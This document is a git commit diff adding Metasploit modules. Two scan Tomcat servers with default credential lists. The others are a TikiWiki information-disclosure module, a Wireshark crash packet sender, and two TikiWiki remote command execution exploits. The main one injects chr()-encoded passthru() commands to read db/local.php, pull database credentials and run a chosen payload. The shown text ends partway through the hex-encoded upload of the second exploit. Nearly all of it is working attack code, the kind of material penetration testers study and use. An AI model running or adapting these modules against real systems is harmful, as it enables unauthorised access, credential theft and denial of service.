added modules from Matteo Cantoni.
git-svn-id: file:///home/svn/framework3/trunk@6170 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
32868c4b0f
commit
ff8323e6d2
|
@ -0,0 +1,132 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanServer
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Tomcat Administration Tool default access',
|
||||
'Version' => '$Revision: $',
|
||||
'Description' => 'Detect Tomcat Administration Tool default access.',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://tomcat.apache.org/'],
|
||||
],
|
||||
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8180),
|
||||
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
|
||||
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
|
||||
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
ver = ""
|
||||
|
||||
if res.body.match(/<title>Apache Tomcat\/(.*)<\/title>/)
|
||||
ver = "Apache Tomcat/" + $1
|
||||
end
|
||||
|
||||
user = datastore['TOMCAT_USER'].to_s
|
||||
pass = datastore['TOMCAT_PASS'].to_s
|
||||
|
||||
if user.length == 0
|
||||
default_usernames = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_usernames = [user]
|
||||
end
|
||||
|
||||
if pass.length == 0
|
||||
default_passwords = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_passwords = [pass]
|
||||
end
|
||||
|
||||
default_usernames.each do |username|
|
||||
default_passwords.each do |password|
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/admin/',
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/JSESSIONID=(.*);(.*)/i))
|
||||
|
||||
jsessionid = $1
|
||||
|
||||
post_data = "j_username=#{username}&j_password=#{password}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => '/admin/j_security_check',
|
||||
'method' => 'POST',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
'data' => post_data,
|
||||
}, 25)
|
||||
|
||||
if (res.code == 302)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/admin/",
|
||||
'method' => 'GET',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
}, 25)
|
||||
|
||||
if (res.code == 302)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/admin/frameset.jsp",
|
||||
'method' => 'GET',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
}, 25)
|
||||
|
||||
if (res.code == 200)
|
||||
print_status("http://#{target_host}:#{rport}/admin [#{res.headers['Server']}] [#{ver}] [Tomcat Server Administration] [#{username}/#{password}]")
|
||||
end
|
||||
|
||||
# LogOut
|
||||
res = send_request_cgi({
|
||||
'uri' => '/admin/logOut.do',
|
||||
'method' => 'GET',
|
||||
'cookie' => "JSESSIONID=#{jsessionid}",
|
||||
}, 25)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,95 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanServer
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Tomcat Application Manager default access',
|
||||
'Version' => '$Revision: $',
|
||||
'Description' => 'Detect Tomcat Web Application Manager default access.',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://tomcat.apache.org/'],
|
||||
],
|
||||
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8180),
|
||||
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
|
||||
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
|
||||
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
user = datastore['TOMCAT_USER'].to_s
|
||||
pass = datastore['TOMCAT_PASS'].to_s
|
||||
|
||||
if user.length == 0
|
||||
default_usernames = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_usernames = [user]
|
||||
end
|
||||
|
||||
if pass.length == 0
|
||||
default_passwords = ['admin','manager','role1','root','tomcat']
|
||||
else
|
||||
default_passwords = [pass]
|
||||
end
|
||||
|
||||
default_usernames.each do |username|
|
||||
default_passwords.each do |password|
|
||||
|
||||
user_pass = Rex::Text.encode_base64("#{username}" + ":" + "#{password}")
|
||||
|
||||
begin
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/manager/html",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Authorization' => "Basic #{user_pass}",
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res.code == 200)
|
||||
print_status("http://#{target_host}:#{rport}/manager/html [#{res.headers['Server']}] [Tomcat Application Manager] [#{username}/#{password}]")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,120 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'TikiWiki information disclosure',
|
||||
'Description' => %q{
|
||||
A vulnerability has been reported in Tikiwiki, which can be exploited by
|
||||
a anonymous user to dump the MySQL user & passwd just by creating a mysql
|
||||
error with the "sort_mode" var.
|
||||
The vulnerability has been reported in Tikiwiki version 1.9.5.
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '30172'],
|
||||
['BID', '20858'],
|
||||
['CVE', '2006-5702'],
|
||||
['MIL', '2701'],
|
||||
['URL', 'http://secunia.com/advisories/22678/'],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 1 2006',
|
||||
'Actions' =>
|
||||
[
|
||||
['Download']
|
||||
],
|
||||
'DefaultAction' => 'Download'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Establishing a connection to the target...")
|
||||
|
||||
rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => rpath,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK")
|
||||
print_status("Get informations about database...")
|
||||
|
||||
n = 0
|
||||
c = 0
|
||||
|
||||
infos = res.body.split(/\r|\n/)
|
||||
infos.each do |row|
|
||||
if (c < 6)
|
||||
if (row.match(/\["file"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("Install path : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["databaseType"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB type : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["database"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB name : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["host"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB host : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["user"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB user : #{y[1]}")
|
||||
end
|
||||
if (row.match(/\["password"\]=>/))
|
||||
c+=1
|
||||
x = n + 1
|
||||
y = infos[x].match(/string\(\d+\) "(.*)"/m)
|
||||
print_status("DB password : #{y[1]}")
|
||||
end
|
||||
n+=1
|
||||
end
|
||||
end
|
||||
|
||||
if (c == 0)
|
||||
print_status("Could not obtain informations about database.")
|
||||
end
|
||||
|
||||
else
|
||||
print_status("No response from the server.")
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,80 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'scruby'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ip
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
|
||||
'Description' => %q{
|
||||
Wireshark crash when dissecting an HTTP chunked response.
|
||||
Versions affected: 0.99.5 (Bug 1394)
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
|
||||
],
|
||||
'DisclosureDate' => 'February 22 2007'))
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
print_status("Sending packet to #{rhost}")
|
||||
|
||||
connect_ip
|
||||
|
||||
pkt =(
|
||||
Scruby::IP.new(
|
||||
:dst => "#{rhost}",
|
||||
:flags => 4,
|
||||
:len => 20,
|
||||
:ttl => 53,
|
||||
:id => 0x2eac,
|
||||
:chksum => 0xfc13
|
||||
)/Scruby::TCP.new(
|
||||
:sport => 80,
|
||||
:dport => 1296,
|
||||
:seq => 1,
|
||||
:ack => 323,
|
||||
:window => 6432,
|
||||
:chksum => 0xfc13,
|
||||
:flags => 18
|
||||
)/"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a").to_net
|
||||
|
||||
ip_write(pkt)
|
||||
|
||||
disconnect_ip
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
HTTP/1.1 302 Found
|
||||
Date: Thu, 22 Feb 2007 21:59:03 GMT
|
||||
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_throttle/3.1.2 mod_psoft_traffic/0.1 mod_ssl/2.8.28 OpenSSL/0.9.6b FrontPage/5.0.2.2635
|
||||
X-Powered-By: PHP/4.4.4
|
||||
Location: http://127.0.0.1/index.html
|
||||
P3P: policyref="http://127.0.0.1/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Pragma: no-cache
|
||||
Content-Disposition: attachment; filename=StatCounter-Log-2287592.csv
|
||||
Set-Cookie: PHPSESSID=d75ed976f009da118eb614b98fd5b916%3B+path%3D%2F
|
||||
Keep-Alive: timeout=15, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
0
|
||||
=end
|
|
@ -0,0 +1,149 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'TikiWiki tiki-graph_formula Remote Command Execution',
|
||||
'Description' => %q{
|
||||
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary commands.
|
||||
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input
|
||||
supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP
|
||||
commands resulting in a loss of integrity.
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '40478'],
|
||||
['BID', '26006'],
|
||||
['CVE', '2007-5423'],
|
||||
['MIL', '4525'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 1024,
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Oct 10 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki v1.|TikiWiki 1./))
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
url_db_local = datastore['URI'] +
|
||||
"/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
|
||||
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." +
|
||||
"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +
|
||||
"chr(59)." + "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" +
|
||||
").die()&t=png&title="
|
||||
|
||||
print_status("Sending request...")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_db_local,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body)
|
||||
print_status("The server returned : #{res.code} #{res.message}")
|
||||
print_status("Server version : #{res.headers['Server']}")
|
||||
|
||||
db_tiki = res.body.match(/db_tiki='(.*?)';/m)
|
||||
dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)
|
||||
host_tiki = res.body.match(/host_tiki='(.*?)';/m)
|
||||
user_tiki = res.body.match(/user_tiki='(.*?)';/m)
|
||||
pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)
|
||||
dbs_tiki = res.body.match(/dbs_tiki='(.*?)';/m)
|
||||
|
||||
print_status("TikiWiki database informations : \n")
|
||||
|
||||
print("db_tiki : " + db_tiki[1] + "\n")
|
||||
print("dbversion : " + dbversion[1] + "\n")
|
||||
print("host_tiki : " + host_tiki[1] + "\n")
|
||||
print("user_tiki : " + user_tiki[1] + "\n")
|
||||
print("pass_tiki : " + pass_tiki[1] + "\n")
|
||||
print("dbs_tiki : " + dbs_tiki[1] + "\n\n")
|
||||
else
|
||||
print_status("No response from the server")
|
||||
end
|
||||
|
||||
command = Rex::Text.uri_encode(payload.encoded)
|
||||
encoded = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"
|
||||
|
||||
url_cmd = datastore['URI'] + "/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
|
||||
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." + encoded + ".chr(59)." +
|
||||
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" + ").die()&t=png&title="
|
||||
|
||||
print_status("Sending request...")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_cmd,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body)
|
||||
|
||||
print_status("The server returned : #{res.code} #{res.message}")
|
||||
cmd_output = res.body.match(/YYY\n(.*)\nYYY/m)
|
||||
|
||||
if (cmd_output)
|
||||
print_status("Command output from the server :")
|
||||
print("\n" + cmd_output[1] + "\n\n")
|
||||
else
|
||||
print_status("This server may not be vulnerable")
|
||||
end
|
||||
|
||||
else
|
||||
print_status("No response from the server")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,204 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'TikiWiki jhot Remote Command Execution',
|
||||
'Description' => %q{
|
||||
TikiWiki contains a flaw that may allow a malicious user to execute
|
||||
arbitrary PHP code. The issue is triggered due to the jhot.php script
|
||||
not correctly verifying uploaded files. It is possible that the flaw
|
||||
may allow arbitrary PHP code execution by uploading a malicious PHP
|
||||
script resulting in a loss of integrity.
|
||||
The vulnerability has been reported in Tikiwiki version 1.9.4.
|
||||
},
|
||||
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '28456'],
|
||||
['BID', '19819'],
|
||||
['CVE', '2006-4602'],
|
||||
['MIL', '2288'],
|
||||
['URL', 'http://secunia.com/advisories/21733/'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 1024,
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Sep 2 2006',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki/"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki 1.9.4/))
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
create_temp_file()
|
||||
|
||||
command = payload.encoded
|
||||
|
||||
exe_command(command)
|
||||
|
||||
remove_temp_file()
|
||||
end
|
||||
|
||||
def create_temp_file
|
||||
url_jhot = datastore['URI'] + "/jhot.php"
|
||||
|
||||
scode =
|
||||
"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
|
||||
"\x64\x65\x72\x3a\x20\x2f\x63\x76\x73\x72\x6f\x6f\x74\x2f\x74\x69" +
|
||||
"\x6b\x69\x77\x69\x6b\x69\x2f\x74\x69\x6b\x69\x2f\x74\x69\x6b\x69" +
|
||||
"\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e" +
|
||||
"\x38\x2e\x32\x2e\x35\x20\x32\x30\x30\x35\x2f\x30\x38\x2f\x32\x32" +
|
||||
"\x20\x30\x38\x3a\x30\x30\x3a\x35\x33\x20\x74\x65\x6c\x65\x6e\x69" +
|
||||
"\x65\x6b\x6f\x20\x45\x78\x70\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20" +
|
||||
"\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30" +
|
||||
"\x30\x32\x2d\x32\x30\x30\x35\x2c\x20\x4c\x75\x69\x73\x20\x41\x72" +
|
||||
"\x67\x65\x72\x69\x63\x68\x2c\x20\x47\x61\x72\x6c\x61\x6e\x64\x20" +
|
||||
"\x46\x6f\x73\x74\x65\x72\x2c\x20\x45\x64\x75\x61\x72\x64\x6f\x20" +
|
||||
"\x50\x6f\x6c\x69\x64\x6f\x72\x2c\x20\x65\x74\x2e\x20\x61\x6c\x2e" +
|
||||
"\x0d\x0a\x2f\x2f\x20\x41\x6c\x6c\x20\x52\x69\x67\x68\x74\x73\x20" +
|
||||
"\x52\x65\x73\x65\x72\x76\x65\x64\x2e\x20\x53\x65\x65\x20\x63\x6f" +
|
||||
"\x70\x79\x72\x69\x67\x68\x74\x2e\x74\x78\x74\x20\x66\x6f\x72\x20" +
|
||||
"\x64\x65\x74\x61\x69\x6c\x73\x20\x61\x6e\x64\x20\x61\x20\x63\x6f" +
|
||||
"\x6d\x70\x6c\x65\x74\x65\x20\x6c\x69\x73\x74\x20\x6f\x66\x20\x61" +
|
||||
"\x75\x74\x68\x6f\x72\x73\x2e\x0d\x0a\x2f\x2f\x20\x4c\x69\x63\x65" +
|
||||
"\x6e\x73\x65\x64\x20\x75\x6e\x64\x65\x72\x20\x74\x68\x65\x20\x47" +
|
||||
"\x4e\x55\x20\x4c\x45\x53\x53\x45\x52\x20\x47\x45\x4e\x45\x52\x41" +
|
||||
